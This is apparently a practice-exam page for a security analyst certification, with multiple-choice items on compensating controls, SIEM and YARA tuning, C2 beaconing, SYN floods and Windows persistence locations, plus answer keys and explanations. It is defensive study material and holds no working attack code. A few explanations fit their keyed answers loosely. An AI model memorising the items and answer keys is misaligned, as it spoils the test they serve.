AnswerC

This chain matches a living-off-the-land binary (LOLBin) technique in which an adversary abuses the trusted svchost.exe process, often via a hijacked or malicious service DLL, to spawn powershell.exe and execute a downloader script while evading signature-based detection. Because svchost.exe is inherently trusted and its child processes are rarely scrutinized, this parent-child anomaly combined with the subsequent executable download is a strong indicator of active compromise requiring immediate isolation and deeper forensic review.

Why this answer

Svchost.exe hosting a child process like powershell.exe is unusual. This parent-child relationship suggests a LOLBin (living off the land) attack, where an attacker abuses legitimate Windows binaries to execute malicious code. The script download further indicates compromise.

66
MCQmedium

During a vulnerability scan of an internal web server, the scanner reports a critical vulnerability with a CVSS score of 9.8. The server is behind a WAF that blocks the attack vector. The system owner states the vulnerability is not exploitable due to the compensating control. Which of the following is the best next step?

A.Re-run the scan with a non-credentialed profile
B.Document the finding and accept the risk with the compensating control
C.Ignore the vulnerability and close the finding
D.Immediately patch the server during business hours
AnswerB

When an active security control, such as a Web Application Firewall, successfully mitigates a vulnerability, formalizing this state through documented risk acceptance is the correct protocol. Security analysts must record the compensating control's details and the residual risk in the risk register to maintain compliance and operational awareness.

Why this answer

The best next step is to document the finding and accept the risk with the compensating control because the WAF blocks the attack vector, making the vulnerability not exploitable. This aligns with risk management principles: compensating controls can reduce risk to an acceptable level, and acceptance should be documented.

Exam trap

CS0-004 often tests the misconception that a high CVSS score mandates immediate patching, ignoring the impact of compensating controls and the need for documented risk acceptance.

How to eliminate wrong answers

Option A is wrong because re-running the scan with a non-credentialed profile does not address the finding or the compensating control; it may provide different results but does not resolve the risk decision. Option C is wrong because ignoring and closing the finding without documentation is not acceptable; risk acceptance must be formalized. Option D is wrong because immediately patching during business hours could cause disruption and may not be necessary given the compensating control; patching should follow change management.

67
Multi-Selecteasy

A security analyst is tuning a SIEM correlation rule that triggers on failed login attempts. The rule is generating a high number of alerts from a specific user who frequently mistypes passwords. The analyst wants to reduce false positives while maintaining detection of brute-force attacks. Which TWO actions should the analyst take?

Select 2 answers
A.Delete the correlation rule and create a new one from scratch
B.Exclude the specific user account from the rule
C.Increase the threshold of failed attempts within a time window
D.Change the rule to alert on every single failed login
E.Increase the severity of the rule to trigger an immediate response
AnswersB, C

By adding an exception or exclusion filter for the specific, known user account within the SIEM correlation logic, the analyst prevents benign, repetitive authentication failures from triggering the alert. This targeted approach directly eliminates false positives generated by this specific user's predictable behavior without degrading the rule's ability to detect brute-force attacks on other accounts.

Why this answer

Increasing the threshold to require more failed attempts in the time window helps ignore simple mistypes, and excluding the specific user account from the rule prevents alerts for that benign behavior.

68
MCQhard

An analyst is reviewing a YARA rule that triggers on a specific string pattern in memory. The rule has a high false positive rate. Which of the following actions would best reduce false positives while maintaining detection capability?

A.Add a condition that requires the string to appear with another indicator
B.Convert the rule to a Sigma rule
C.Remove the rule from active use
D.Increase the string length in the rule
AnswerA

Adding logical conditions, such as requiring the presence of an auxiliary malicious string or a specific file header, increases the rule's specificity. This multi-indicator approach significantly reduces false positives by ensuring the rule only triggers when a combination of unique threat characteristics is met, rather than a single, potentially benign string.

Why this answer

YARA false positives occur when a single string pattern is too generic and matches benign files. Adding a condition that requires the string to co-occur with another indicator (for example, using 'and' or proximity operators like '2 of them' or 'all of them') increases specificity while preserving the ability to detect the malicious pattern. This is the standard YARA tuning technique because it raises the rule's precision without discarding the detection logic.

Exam trap

The trap here is assuming that any change to the rule (converting format, lengthening strings, or disabling it) will reduce false positives, when only adding a logical co-occurrence condition preserves detection while improving precision.

How to eliminate wrong answers

Option B is wrong because converting a YARA rule to Sigma changes the detection format and target platform (Sigma targets log/SIEM data, not memory/file scanning) — it does not reduce false positives and may not even be applicable to memory scanning. Option C is wrong because removing the rule eliminates detection entirely, which fails the requirement to maintain detection capability. Option D is wrong because simply increasing string length is a blunt approach that can miss variants and does not guarantee reduced false positives; it may also break detection of the actual threat if the longer string is not present in all samples.

69
MCQmedium

A security analyst notices that a firewall log shows outbound traffic from an internal server to an external IP address on TCP port 443, but the server is not configured to make any outbound connections. The analyst checks previous logs and finds similar connections every 60 minutes. What type of activity is most likely occurring?

A.Beaconing to a command-and-control server
B.Normal software update check
C.DNS tunneling
D.Data exfiltration via FTP
AnswerA

This behavior is characteristic of malware beaconing, where a compromised host establishes periodic, scheduled outbound connections to a command-and-control (C2) server to receive instructions. Utilizing port 443 allows this malicious traffic to blend seamlessly with legitimate, encrypted HTTPS web traffic, bypassing basic firewall inspection.

Why this answer

Regular outbound connections every 60 minutes to an external IP on port 443 from a server that should not make outbound connections is a textbook beaconing pattern. Malware uses periodic callbacks to a command-and-control (C2) server to receive instructions and exfiltrate data, often disguising traffic as HTTPS to evade detection. The fixed interval and unexpected destination strongly indicate C2 beaconing.

Exam trap

CS0-004 often tests the assumption that any HTTPS traffic is benign — candidates pick 'software update' because port 443 looks legitimate, missing the unexpected source and fixed interval that signal C2 beaconing.

How to eliminate wrong answers

Option B is wrong because a legitimate software update check would typically come from a known vendor domain and be configured or documented — an unconfigured server making regular external connections is not normal update behavior. Option C is wrong because DNS tunneling uses DNS queries (port 53) to exfiltrate data, not TCP port 443 to an external IP. Option D is wrong because FTP uses ports 20/21, not 443, and exfiltration via FTP would not typically present as regular 60-minute beacons on HTTPS.

70
MCQmedium

An analyst is investigating a potential data exfiltration via DNS. Which tool would best help identify DNS tunnelling by analyzing packet payloads and query patterns?

A.Wireshark
B.tcpdump
C.nmap
D.NetFlow
AnswerA

Wireshark is a graphical packet analyzer that allows analysts to perform deep packet inspection on captured network traffic. By reconstructing TCP streams and dissecting application-layer payloads, it enables the precise identification of sensitive data being exfiltrated. This granular visibility is crucial for verifying the exact contents of suspicious transmissions.

Why this answer

Wireshark can capture and analyze DNS packets in detail, including payload and query patterns, making it suitable for detecting DNS tunnelling.

71
MCQmedium

A vulnerability scan report shows a critical vulnerability with a CVSS score of 9.8 on an internal web server. The server is not internet-facing and is protected by a compensating control: a web application firewall (WAF) that blocks the attack vector. What should the analyst recommend?

A.Schedule an immediate emergency patch
B.Remove the WAF to ensure the vulnerability is addressed
C.Document the compensating control and reduce the risk rating
D.Ignore the finding because it is a false positive
AnswerC

Proper risk management requires documenting the active compensating control, such as a WAF rule blocking the specific exploit vector, within the risk register. Because this control significantly reduces the likelihood of successful exploitation, the risk rating should be adjusted downward to reflect the actual residual risk. This ensures accurate reporting and prioritization for the security team.

Why this answer

The vulnerability has a high CVSS score, but the compensating control (WAF) reduces the risk. The analyst should document the control and adjust the risk rating rather than patching immediately if patching would cause downtime.

72
MCQhard

An analyst is reviewing a packet capture and observes a series of TCP SYN packets sent to a server, each followed by a SYN-ACK from the server, but no ACK from the client. The source IP is spoofed. What type of attack is most likely occurring?

A.Man-in-the-middle attack
B.DNS amplification attack
C.TCP SYN flood attack
D.TCP reset attack
AnswerC

This pattern of sending SYN packets, receiving SYN-ACK responses, and intentionally withholding the final ACK packet is the hallmark of a TCP SYN flood. By leaving these connections half-open, the attacker rapidly exhausts the target's connection queue (backlog queue), rendering the service unavailable to legitimate users.

Why this answer

The scenario describes a TCP SYN flood attack, where an attacker sends a series of TCP SYN packets with spoofed source IPs to a server. The server responds with SYN-ACK to the spoofed IP, but the client never sends the final ACK, leaving half-open connections that exhaust the server's connection table. This is a classic denial-of-service attack.

Exam trap

CompTIA CySA+ often tests the ability to distinguish between different network attacks based on packet patterns; candidates may confuse SYN flood with other TCP-based attacks like reset attacks or session hijacking.

How to eliminate wrong answers

Option A is wrong because a man-in-the-middle attack involves intercepting and possibly altering communication between two parties, not flooding with SYN packets. Option B is wrong because a DNS amplification attack uses DNS queries with spoofed source IPs to overwhelm a target with large responses, not TCP SYN packets. Option D is wrong because a TCP reset attack involves sending forged TCP RST packets to terminate connections, not SYN packets that initiate half-open connections.

73
MCQmedium

A security analyst is triaging a SIEM alert for 'Multiple failed logins followed by a successful login from a remote IP'. The successful login occurs after 10 failed attempts. What is the most likely classification?

A.True positive for a brute-force attack
B.False positive due to a misconfigured application
C.False positive due to user error
D.True positive for a password spraying attack
AnswerA

This scenario represents a classic true positive for a brute-force attack, where an attacker systematically attempts numerous credential combinations against a single account from a single source IP until succeeding. The sequence of multiple rapid authentication failures followed immediately by a successful login is a high-fidelity indicator of compromise (IoC) that confirms the attack was successful.

Why this answer

The pattern of multiple failures followed by a success strongly indicates a successful brute-force attack, which is a true positive.

74
Multi-Selecthard

A security analyst is using osquery to hunt for persistence mechanisms on a Windows endpoint. Which THREE Windows artifacts should the analyst query to identify common persistence locations? (Select THREE.)

Select 3 answers
A.Scheduled tasks in the Task Scheduler
B.Windows Event Logs for login events
C.Network connections from the endpoint
D.Registry key: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
E.Services listed in the Service Control Manager
AnswersA, D, E

Scheduled tasks allow the operating system to launch specified commands or executables on triggers such as system startup, user logon, or defined intervals. Attackers frequently create scheduled tasks that re-download or re-execute malicious payloads, and these tasks persist across reboots by being stored in the Task Scheduler database. Osquery can enumerate them through the scheduled_tasks table, revealing the task name, path, and schedule, which helps identify malicious creations with autorun capabilities.

Why this answer

Option A is correct because scheduled tasks in the Task Scheduler are a classic persistence mechanism, allowing attackers to execute code at defined times or triggers, and osquery can enumerate them via the scheduled_tasks table. Option D is correct because the HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run registry key causes programs to launch automatically at user logon, a well-known autostart location queryable through osquery's registry table. Option E is correct because services registered in the Service Control Manager can be configured to start automatically at boot, providing persistent execution, and osquery exposes them via the services table.

Option B does not belong because Windows Event Logs for login events are useful for auditing authentication activity, not for identifying persistence locations. Option C does not belong because network connections reflect current or recent communications, not a persistence mechanism stored on the endpoint.

Exam trap

CS0-004 often tests the distinction between persistence artifacts (auto-execution locations) and detection telemetry (logs, network connections) — candidates pick Event Logs because they 'show what happened,' but logs are not a persistence mechanism.

75
MCQmedium

An analyst is investigating a suspicious email attachment. The sandbox analysis shows that the document drops a binary that connects to an external IP on port 4444. Which network analysis tool is best suited to confirm if any internal hosts are communicating on that port?

A.tcpdump
B.nmap
C.Wireshark
D.NetFlow analyzer
AnswerD

A NetFlow analyzer aggregates metadata about network conversations, such as source/destination IPs, ports, and timestamps, without the overhead of full packet payloads. This lightweight data structure allows security analysts to rapidly query months of historical traffic across the entire enterprise to pinpoint which hosts communicated with a malicious external IP.

Why this answer

NetFlow collects metadata about network flows, including destination IP and port, enabling analysts to query for all traffic on a specific port across the network.

Page 1 of 2 · 125 questions totalNext →

Ready to test yourself?

Try a timed practice session using only Security questions.